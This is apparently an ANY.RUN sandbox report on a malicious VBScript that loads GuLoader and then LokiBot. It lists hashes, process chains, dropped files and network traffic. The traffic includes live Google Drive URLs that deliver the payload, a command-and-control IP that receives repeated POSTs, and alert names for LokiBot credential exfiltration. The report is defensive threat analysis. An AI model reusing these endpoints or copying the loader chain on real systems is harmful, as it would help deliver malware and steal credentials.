File name: Gymnasielrere84.vbs

Full analysis: https://app.any.run/tasks/72fad8a6-bb32-46be-8811-22a8d3005aee
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Analysis date: September 22, 2024, 17:41:29
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
guloader
loader
lokibot
stealer
xor-url
generic
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5: 0D5AA3C54F12FB3D254DC0ED6F946D2E
SHA1: 04D6915391BC112A8DCC482616473D21E67209AC
SHA256: 8B496E6F6FA5824FC7A95DC9844FDCBBB3D8ABB215476FFC2E2ABE0142BE0447
SSDEEP: 384:Z9vOg3hVg1cC9a4pYTagc3NE7p5sUm5zSouEDfvl/7GRh/DvvxsWoutDwTK:Zp3hzC9aqYTEZUKXDfN/7GR1zxsODb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • GULOADER has been detected

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1148)
    • XORed URL has been found (YARA)

      • wabmig.exe (PID: 7036)
  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6916)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6916)
      • cmd.exe (PID: 4288)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1148)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1148)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1148)
      • powershell.exe (PID: 6340)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 1148)
      • powershell.exe (PID: 6340)
    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 1148)
    • Executable content was dropped or overwritten

      • wabmig.exe (PID: 7036)
    • Process drops legitimate windows executable

      • wabmig.exe (PID: 7036)
  • INFO

    • The process uses the downloaded file

      • wscript.exe (PID: 6916)
    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 6916)
      • cmd.exe (PID: 4288)
    • Disables trace logs

      • powershell.exe (PID: 6340)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1148)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1148)
    • Checks proxy server information

      • powershell.exe (PID: 6340)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1148)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 1148)
      • powershell.exe (PID: 6340)
No Malware configuration.
Total processes: 127
Monitored processes: 8
Malicious processes: 5
Suspicious processes: 0

Behavior graph

Processes shown (in graph order): start, wscript.exe, powershell.exe (#GULOADER), conhost.exe, cmd.exe, cmd.exe, powershell.exe (#GULOADER), cmd.exe, wabmig.exe (#XOR-URL)

Process information (columns: PID, CMD, Path, Indicators, Parent process)

PID: 1148
CMD: "C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script omitted>"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules / Images:
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll

PID: 1640
CMD: "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Trkisternes.Brk && echo t"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Modules / Images:
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll

PID: 4288
CMD: "C:\WINDOWS\system32\cmd.exe" /c ^"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<obfuscated PowerShell script omitted>"
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules / Images:
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll

PID: 4772
CMD: "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Trkisternes.Brk && echo t"
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules / Images:
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll

PID: 6340
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script omitted>"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules / Images:
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 6436
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules / Images:
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 6916
CMD: "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\Desktop\Gymnasielrere84.vbs
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.812.10240.16384
Modules / Images:
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID: 7036
CMD: "C:\Program Files (x86)\windows mail\wabmig.exe"
Path: C:\Program Files (x86)\Windows Mail\wabmig.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) Contacts Import Tool
Version: 10.0.19041.3636 (WinBuild.160101.0800)

Total events: 10 420
Read events: 10 420
Write events: 0
Delete events: 0

Modification events: no data

Executable files: 1
Suspicious files: 6
Text files: 5
Unknown types: 0

Dropped files

PID | Process | Filename | Type
6340 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wp4xrrfo.yyk.ps1 | text
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1148 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary
    MD5: 8E7D26D71A1CAF822C338431F0651251
    SHA256: 495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
7036 | wabmig.exe | C:\Users\admin\AppData\Roaming\F3F363\3C28B3.hdb | binary
    MD5: 1013079A9BF8FFA458C230EA6AAF8A89
    SHA256: 1B1F3BCE8DF0FC7E33B518DAB09D09AF3680E39BCC3C760DADCC50C931007BE8
7036 | wabmig.exe | C:\Users\admin\AppData\Roaming\F3F363\3C28B3.lck | binary
    MD5: C4CA4238A0B923820DCC509A6F75849B
    SHA256:
1148 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ap1cetff.mwm.psm1 | text
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1148 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5oqzhbzh.v3h.ps1 | text
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6340 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_i3ef5vur.32h.psm1 | text
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7036 | wabmig.exe | C:\Users\admin\AppData\Roaming\F3F363\3C28B3.exe | executable
    MD5: AD6081F6434A2E186E49F64C069CD8BF
    SHA256: 7E3B061A41AB3BF3F6F6A701148E50769E1208ABAB70235B85E1CF0E929729E1
7036 | wabmig.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\0f5007522459c86e95ffcc62f32308f1_bb926e54-e3ca-40fd-ae90-2764341e7792 | binary
    MD5: D898504A722BFF1524134C6AB6A5EAA5
    SHA256: 878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
6340 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
    MD5: 47004ADDD8953568AAE3C8C9335114B0
    SHA256: 050EE8B11CC688C5478A46A2CCC3ABE9023BC80E617EBCEDBCADCBB21DCA95A3
HTTP(S) requests: 11
TCP/UDP connections: 26
DNS requests: 7
Threats: 14

HTTP requests ("-" marks a cell the report leaves empty)

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2864 | RUXIMICS.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
- | - | GET | 303 | 142.250.185.196:443 | https://drive.google.com/uc?export=download&id=1lI7SoYb_aBEmRmJJI-u31JgwtXJMn_Qm | unknown | - | - | -
2120 | MoUsoCoreWorker.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
- | - | GET | 303 | 142.250.185.196:443 | https://drive.google.com/uc?export=download&id=1EnM8GOCjgl_bDxtuyCHqVfNNgLyGaAWF | unknown | - | - | -
- | - | POST | 500 | 137.184.191.215:80 | http://137.184.191.215/index.php/wp.php?view=1 | unknown | - | - | unknown
- | - | POST | 500 | 137.184.191.215:80 | http://137.184.191.215/index.php/wp.php?view=1 | unknown | - | - | unknown
- | - | POST | 500 | 137.184.191.215:80 | http://137.184.191.215/index.php/wp.php?view=1 | unknown | - | - | unknown
- | - | POST | 500 | 137.184.191.215:80 | http://137.184.191.215/index.php/wp.php?view=1 | unknown | - | - | unknown
4076 | svchost.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
- | - | GET | 200 | 142.250.186.65:443 | https://drive.usercontent.google.com/download?id=1lI7SoYb_aBEmRmJJI-u31JgwtXJMn_Qm&export=download | unknown | text | 471 Kb | -

Connections ("-" marks a cell the report leaves empty)

PID | Process | IP | Domain | ASN | CN | Reputation
3888 | svchost.exe | 239.255.255.250:1900 | - | - | - | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4076 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
2864 | RUXIMICS.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
2120 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
4076 | svchost.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
2864 | RUXIMICS.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
2120 | MoUsoCoreWorker.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
6340 | powershell.exe | 142.250.186.174:443 | drive.google.com | GOOGLE | US | shared

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 20.73.194.208 | whitelisted
google.com | 142.250.74.206 | whitelisted
www.microsoft.com | 88.221.169.152 | whitelisted
drive.google.com | 142.250.186.174, 142.250.186.110 | shared
drive.usercontent.google.com | 142.250.186.65 | whitelisted

Threats (PID and Process columns are empty in the report)

Class | Message
A Network Trojan was detected | ET MALWARE LokiBot User-Agent (Charon/Inferno)
A Network Trojan was detected | ET MALWARE LokiBot User-Agent (Charon/Inferno)
Malware Command and Control Activity Detected | ET MALWARE LokiBot Checkin
Malware Command and Control Activity Detected | ET MALWARE LokiBot Checkin
A Network Trojan was detected | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
A Network Trojan was detected | ET MALWARE LokiBot User-Agent (Charon/Inferno)
Malware Command and Control Activity Detected | ET MALWARE LokiBot Checkin
A Network Trojan was detected | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
Malware Command and Control Activity Detected | ET MALWARE LokiBot Request for C2 Commands Detected M2
Malware Command and Control Activity Detected | ET MALWARE LokiBot Request for C2 Commands Detected M1
No debug info